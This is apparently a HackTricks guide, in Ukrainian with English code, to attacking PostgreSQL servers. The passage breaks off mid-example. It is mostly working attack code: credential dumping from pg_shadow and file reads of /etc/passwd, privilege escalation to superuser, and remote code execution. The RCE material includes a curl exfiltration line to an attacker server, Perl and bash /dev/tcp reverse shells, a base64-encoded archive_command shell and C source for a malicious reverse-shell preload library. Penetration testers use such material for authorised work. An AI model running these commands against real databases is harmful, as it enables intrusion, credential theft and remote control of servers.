5432,5433 - Pentesting Postgresql

Використовуйте Trickest для легкого створення та автоматизації робочих процесів, підтримуваних найсучаснішими інструментами спільноти. Отримайте доступ сьогодні:

Підтримайте HackTricks

Основна інформація

PostgreSQL описується як об'єктно-реляційна система управління базами даних, яка є відкритим кодом. Ця система не лише використовує мову SQL, але й покращує її додатковими функціями. Її можливості дозволяють обробляти широкий спектр типів даних та операцій, що робить її універсальним вибором для розробників та організацій.

Порт за замовчуванням: 5432, і якщо цей порт вже використовується, то, здається, postgresql використовуватиме наступний порт (ймовірно, 5433), який не використовується.

PORT     STATE SERVICE
5432/tcp open  pgsql

Підключення та базове перерахування

psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

# Get current user
SELECT user;

# Get current database
SELECT current_catalog;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show installed extensions
SHOW rds.extensions;
SELECT * FROM pg_extension;

# Get history of commands executed
\s

Якщо при виконанні \list ви знайдете базу даних під назвою rdsadmin, ви знаєте, що ви всередині AWS postgresql database.

Для отримання додаткової інформації про як зловживати PostgreSQL базою даних дивіться:

Автоматичне перерахування

msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

Сканування портів

Згідно з цим дослідженням, коли спроба підключення не вдається, dblink викидає виключення sqlclient_unable_to_establish_sqlconnection, яке містить пояснення помилки. Приклади цих деталей наведені нижче.

SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
user=name
password=secret
dbname=abc
connect_timeout=10');
  • Хост недоступний

ДЕТАЛІ: не вдалося підключитися до сервера: Немає маршруту до хоста. Чи працює сервер на хості "1.2.3.4" і приймає TCP/IP з'єднання на порту 5678?

  • Порт закритий

DETAIL:  could not connect to server: Connection refused Is  the  server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
  • Порт відкритий

DETAIL:  server closed the connection unexpectedly This  probably  means
the server terminated abnormally before or while processing the request

or

DETAIL:  FATAL:  password authentication failed for user "name"
  • Порт відкритий або фільтрується

DETAIL:  could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?

У функціях PL/pgSQL наразі неможливо отримати деталі виключень. Однак, якщо у вас є прямий доступ до сервера PostgreSQL, ви можете отримати необхідну інформацію. Якщо витягти імена користувачів та паролі з системних таблиць неможливо, ви можете розглянути можливість використання методу атаки зі словником, обговореного в попередньому розділі, оскільки це може дати позитивні результати.

Перерахування Привілеїв

Ролі

Цікаві Групи

  • Якщо ви є членом pg_execute_server_program, ви можете виконувати програми

  • Якщо ви є членом pg_read_server_files, ви можете читати файли

  • Якщо ви є членом pg_write_server_files, ви можете писати файли

Зверніть увагу, що в Postgres користувач, група та роль є одним і тим же. Це залежить від того, як ви це використовуєте і чи дозволяєте їй входити в систему.

# Get users roles
\du

#Get users roles & groups
# r.rolpassword
# r.rolconfig,
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolbypassrls,
r.rolconnlimit,
r.rolvaliduntil,
r.oid,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

# Check if current user is superiser
## If response is "on" then true, if "off" then false
SELECT current_setting('is_superuser');

# Try to grant access to groups
## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
## You will probably get this error:
## Cannot GRANT on the "pg_write_server_files" role without being a member of the role.

# Create new role (user) as member of a role (group)
CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files;
## Common error
## Cannot GRANT on the "pg_read_server_files" role without being a member of the role.

Таблиці

# Get owners of tables
select schemaname,tablename,tableowner from pg_tables;
## Get tables where user is owner
select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres';

# Get your permissions over tables
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;

#Check users privileges over a table (pg_shadow on this example)
## If nothing, you don't have any permission
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';

Функції

# Interesting functions are inside pg_catalog
\df * #Get all
\df *pg_ls* #Get by substring
\df+ pg_read_binary_file #Check who has access

# Get all functions of a schema
\df pg_catalog.*

# Get all functions of a schema (pg_catalog in this case)
SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position
FROM information_schema.routines
LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name
WHERE routines.specific_schema='pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;

# Another aparent option
SELECT * FROM pg_proc;

File-system actions

Read directories and files

З цього коміту члени визначеної DEFAULT_ROLE_READ_SERVER_FILES групи (названої pg_read_server_files) та суперкористувачі можуть використовувати метод COPY на будь-якому шляху (перевірте convert_and_check_filename у genfile.c):

# Read file
CREATE TABLE demo(t text);
COPY demo from '/etc/passwd';
SELECT * FROM demo;

Пам'ятайте, що якщо ви не є суперкористувачем, але маєте права CREATEROLE, ви можете додати себе до цього групи:

GRANT pg_read_server_files TO username;

Більше інформації.

Існують інші функції postgres, які можна використовувати для читання файлів або переліку директорій. Тільки суперкористувачі та користувачі з явними дозволами можуть їх використовувати:

# Before executing these function go to the postgres DB (not in the template1)
\c postgres
## If you don't do this, you might get "permission denied" error even if you have permission

select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd', 0, 1000000);
select * from pg_read_binary_file('/etc/passwd');

# Check who has permissions
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file

# Try to grant permissions
GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
# By default you can only access files in the datadirectory
SHOW data_directory;
# But if you are a member of the group pg_read_server_files
# You can access any file, anywhere
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation

Ви можете знайти більше функцій в https://www.postgresql.org/docs/current/functions-admin.html

Просте записування файлів

Тільки суперкористувачі та члени pg_write_server_files можуть використовувати copy для запису файлів.

copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';

Пам'ятайте, що якщо ви не є суперкористувачем, але маєте права CREATEROLE, ви можете додати себе до цієї групи:

GRANT pg_write_server_files TO username;

Більше інформації.

Пам'ятайте, що COPY не може обробляти символи нового рядка, тому навіть якщо ви використовуєте корисне навантаження base64, вам потрібно надіслати однорядковий запит. Дуже важливе обмеження цієї техніки полягає в тому, що copy не може бути використаний для запису бінарних файлів, оскільки він змінює деякі бінарні значення.

Завантаження бінарних файлів

Однак існують інші техніки для завантаження великих бінарних файлів:

Порада для баг-баунті: зареєструйтесь на Intigriti, преміум платформі для баг-баунті, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні та почніть заробляти винагороди до $100,000!

Оновлення даних таблиці PostgreSQL через запис локального файлу

Якщо у вас є необхідні дозволи для читання та запису файлів сервера PostgreSQL, ви можете оновити будь-яку таблицю на сервері, перезаписавши відповідний файл вузла в каталозі даних PostgreSQL. Більше про цю техніку тут.

Необхідні кроки:

  1. Отримайте каталог даних PostgreSQL

SELECT setting FROM pg_settings WHERE name = 'data_directory';

Примітка: Якщо ви не можете отримати поточний шлях до каталогу даних з налаштувань, ви можете запитати основну версію PostgreSQL через запит SELECT version() і спробувати перебрати шлях. Загальні шляхи до каталогу даних на Unix-інсталяціях PostgreSQL: /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/. Загальне ім'я кластера - main. 2. Отримайте відносний шлях до файлу вузла, пов'язаного з цільовою таблицею

SELECT pg_relation_filepath('{TABLE_NAME}')

Цей запит повинен повернути щось на зразок base/3/1337. Повний шлях на диску буде $DATA_DIRECTORY/base/3/1337, тобто /var/lib/postgresql/13/main/base/3/1337. 3. Завантажте файл вузла через функції lo_*

SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
  1. Отримайте тип даних, пов'язаний з цільовою таблицею

SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
  1. Використовуйте PostgreSQL Filenode Editor для редагування файлу вузла; встановіть всі булеві прапори rol* на 1 для повних прав.

python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}
SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
  1. (Опціонально) Очистіть кеш таблиці в пам'яті, запустивши витратний SQL-запит

SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
  1. Тепер ви повинні бачити оновлені значення таблиці в PostgreSQL.

Ви також можете стати суперадміністратором, редагуючи таблицю pg_authid. Дивіться наступний розділ.

RCE

RCE до програми

Оскільки версія 9.3, тільки суперкористувачі та члени групи pg_execute_server_program можуть використовувати copy для RCE (приклад з ексфільтрацією:

'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -

Приклад для exec:

#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';

Пам'ятайте, що якщо ви не є суперкористувачем, але маєте права CREATEROLE, ви можете додати себе до цієї групи:

GRANT pg_execute_server_program TO username;

Більше інформації.

Або використовуйте модуль multi/postgres/postgres_copy_from_program_cmd_exec з metasploit. Більше інформації про цю вразливість тут. Хоча це було зареєстровано як CVE-2019-9193, Postges оголосив, що це функція і не буде виправлено.

RCE з мовами PostgreSQL

RCE з розширеннями PostgreSQL

Якщо ви навчилися з попереднього посту як завантажувати бінарні файли, ви можете спробувати отримати RCE, завантажуючи розширення postgresql і завантажуючи його.

RCE з конфігураційного файлу PostgreSQL

Наступні вектори RCE особливо корисні в обмежених контекстах SQLi, оскільки всі кроки можуть бути виконані через вкладені оператори SELECT

Конфігураційний файл PostgreSQL є записуваним користувачем postgres, який запускає базу даних, тому як суперкористувач, ви можете записувати файли в файловій системі, а отже, ви можете перезаписати цей файл.

RCE з ssl_passphrase_command

Більше інформації про цю техніку тут.

Конфігураційний файл має кілька цікавих атрибутів, які можуть призвести до RCE:

  • ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key' Шлях до приватного ключа бази даних

  • ssl_passphrase_command = '' Якщо приватний файл захищений паролем (шифрований), postgresql виконає команду, вказану в цьому атрибуті.

  • ssl_passphrase_command_supports_reload = off Якщо цей атрибут включений, команда, що виконується, якщо ключ захищений паролем, буде виконана під час виконання pg_reload_conf().

Отже, зловмиснику потрібно:

  1. Скинути приватний ключ з сервера

  2. Зашифрувати завантажений приватний ключ:

  3. rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key

  4. Перезаписати

  5. Скинути поточну конфігурацію postgresql

  6. Перезаписати конфігурацію з вказаними атрибутами:

  7. ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'

  8. ssl_passphrase_command_supports_reload = on

  9. Виконати pg_reload_conf()

Під час тестування я помітив, що це буде працювати лише якщо файл приватного ключа має привілеї 640, він належить root і групі ssl-cert або postgres (щоб користувач postgres міг його читати), і розміщений у /var/lib/postgresql/12/main.

RCE з archive_command

Більше інформації про цю конфігурацію та про WAL тут.

Ще один атрибут у конфігураційному файлі, який можна експлуатувати, це archive_command.

Для цього archive_mode має бути 'on' або 'always'. Якщо це правда, то ми можемо перезаписати команду в archive_command і змусити її виконатися через операції WAL (журнал попереднього запису).

Загальні кроки:

  1. Перевірте, чи увімкнено режим архівування: SELECT current_setting('archive_mode')

  2. Перезапишіть archive_command з корисним навантаженням. Наприклад, зворотний шелл: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'

  3. Перезавантажте конфігурацію: SELECT pg_reload_conf()

  4. Примусьте операцію WAL виконатися, що викличе команду архівування: SELECT pg_switch_wal() або SELECT pg_switch_xlog() для деяких версій Postgres

RCE з попередньо завантаженими бібліотеками

Більше інформації про цю техніку тут.

Цей вектор атаки використовує наступні змінні конфігурації:

  • session_preload_libraries -- бібліотеки, які будуть завантажені сервером PostgreSQL під час підключення клієнта.

  • dynamic_library_path -- список директорій, де сервер PostgreSQL шукатиме бібліотеки.

Ми можемо встановити значення dynamic_library_path на директорію, записувану користувачем postgres, що запускає базу даних, наприклад, директорію /tmp/, і завантажити туди шкідливий об'єкт .so. Далі ми змусимо сервер PostgreSQL завантажити нашу нову бібліотеку, включивши її в змінну session_preload_libraries.

Кроки атаки:

  1. Завантажте оригінальний postgresql.conf

  2. Включіть директорію /tmp/ у значення dynamic_library_path, наприклад, dynamic_library_path = '/tmp:$libdir'

  3. Включіть ім'я шкідливої бібліотеки в значення session_preload_libraries, наприклад, session_preload_libraries = 'payload.so'

  4. Перевірте основну версію PostgreSQL за допомогою запиту SELECT version()

  5. Скомпілюйте код шкідливої бібліотеки з правильним пакетом розробника PostgreSQL Приклад коду:

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

void _init() {
/*
код взятий з https://www.revshells.com/
*/

int port = REVSHELL_PORT;
struct sockaddr_in revsockaddr;

int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("REVSHELL_IP");

connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);

char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}

Компілірування коду:

gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
  1. Завантажте шкідливий postgresql.conf, створений на етапах 2-3, і перезапишіть оригінальний

  2. Завантажте payload.so з етапу 5 у директорію /tmp

  3. Перезавантажте конфігурацію сервера, перезапустивши сервер або викликавши запит SELECT pg_reload_conf()

  4. При наступному підключенні до БД ви отримаєте зворотне з'єднання шеллу.

Підвищення привілеїв Postgres

Підвищення привілеїв CREATEROLE

Надання

Згідно з документацією: Ролі, що мають привілей CREATEROLE, можуть надавати або відкликати членство в будь-якій ролі, яка не є суперкористувачем.

Отже, якщо у вас є дозвіл CREATEROLE, ви можете надати собі доступ до інших ролей (які не є суперкористувачами), що можуть дати вам можливість читати та записувати файли та виконувати команди:

# Access to execute commands
GRANT pg_execute_server_program TO username;
# Access to read files
GRANT pg_read_server_files TO username;
# Access to write files
GRANT pg_write_server_files TO username;

Змінити пароль

Користувачі з цією роллю також можуть змінювати паролі інших не-суперкористувачів:

#Change password
ALTER USER user_name WITH PASSWORD 'new_password';

Privesc to SUPERUSER

Досить поширено, що локальні користувачі можуть входити в PostgreSQL без надання будь-якого пароля. Тому, як тільки ви отримали дозволи на виконання коду, ви можете зловживати цими дозволами, щоб надати собі роль SUPERUSER:

COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';

Це зазвичай можливо через наступні рядки у файлі pg_hba.conf:

# "local" is for Unix domain socket connections only
local   all             all                                     trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust

ALTER TABLE privesc

У цьому звіті пояснюється, як було можливим privesc у Postgres GCP, зловживаючи привілеєм ALTER TABLE, який був наданий користувачу.

Коли ви намагаєтеся зробити іншого користувача власником таблиці, ви повинні отримати помилку, яка цьому заважає, але, очевидно, GCP надала цю опцію не-суперкористувачу postgres в GCP:

Поєднуючи цю ідею з тим фактом, що коли команди INSERT/UPDATE/ANALYZE виконуються на таблиці з функцією індексу, функція викликається як частина команди з дозволами власника таблиці. Можливо створити індекс з функцією та надати дозволи власника суперкористувачу над цією таблицею, а потім виконати ANALYZE над таблицею з шкідливою функцією, яка зможе виконувати команди, оскільки використовує привілеї власника.

GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);

Exploitation

  1. Почніть з створення нової таблиці.

  2. Вставте деякий нерелевантний контент у таблицю, щоб надати дані для функції індексації.

  3. Розробіть шкідливу функцію індексації, яка містить код виконання, що дозволяє виконувати несанкціоновані команди.

  4. Змініть власника таблиці на "cloudsqladmin", що є роллю суперкористувача GCP, яка використовується виключно Cloud SQL для управління та обслуговування бази даних.

  5. Виконайте операцію ANALYZE на таблиці. Ця дія змушує движок PostgreSQL перейти в контекст користувача власника таблиці, "cloudsqladmin". Внаслідок цього шкідлива функція індексації викликається з правами "cloudsqladmin", що дозволяє виконання раніше несанкціонованої команди оболонки.

In PostgreSQL, this flow looks something like this:

CREATE TABLE temp_table (data text);